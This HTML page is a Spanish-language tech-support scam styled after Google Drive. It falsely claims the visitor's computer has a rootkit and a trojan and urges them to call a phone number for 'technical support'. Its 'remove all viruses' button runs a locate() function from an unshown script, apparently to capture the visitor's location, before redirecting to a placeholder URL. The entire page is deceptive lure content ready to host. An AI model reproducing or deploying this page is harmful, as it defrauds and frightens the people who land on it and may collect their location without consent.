<!DOCTYPE html>
<html lang="en">
<head>
	<meta name="description" content="Web word processing, presentations and spreadsheets">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=0">
	<link rel="shortcut icon" href="/images/drive_favicon1.ico">
	<title>ALERTA DO VIRUS CARALHO</title>
	<link rel="stylesheet" type="text/css" href="css/main.css">
	<script type="text/javascript">
    	if (window.location.protocol == "http:") {
        	var restOfUrl = window.location.href.substr(5);
        	window.location = "https:" + restOfUrl;
    	}
    </script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
	<script type="text/javascript" src="js/location.js"></script>
</head>
<body class="fondo" >
    <center>
		<div class="cuadrao" >
			<div style="display: flex;">
				<div class="div">
				<img class="tamaño" src="../../../Imagenes/ATENCIÓN ATENCIÓN.svg" alt="ATENCIÓN ATENCIÓN" >
				</div>
				<div>
					<h1 class="titulo" >CUIDADO!</h1>
				</div>
			</div>
			<div>
				<h1 class="subtitulo">SU COMPUTADORA ESTA INFECTADA:</h1>
			</div>
			<div>
				<h4>El sistema ha detectado (2) Virus Potencialmente maliciosos: Rootkit.Sirefef.Spy y Trojan.FakeAV-Descargas.
				<h4>Tu informacion personal y financial NO ESTA A SALVO</h4>
			</div>
			<div>
				<h1 class="subtitulo2">Para remover los virus, Llame a nuestro soporte tecnico Online Ya:</h1>
			</div>
			<div style="display: flex;">
				<h1 class="numero">299-609-8516</h1>
				<img class="tamaño2" src="../../../Imagenes/Tecnico.png" alt="Tito Calderón" >
			</div>
			<div>
				<p>Nuestro mejor soporte esta en linea es prioritario!</p>
			</div>
			<div>
				<center>
					<button class="tam" id="requestButton" style="font-weight:bold" class="jfk-button jfk-button-action" onclick="locate(function(){window.location='REDIRECT_URL';}, function(){$('#change').html('Failed');});">REMOVER TODOS LOS VIRUS YA</button>
				</center>
			</div>
		</div>
	</center>
</body>
</html>
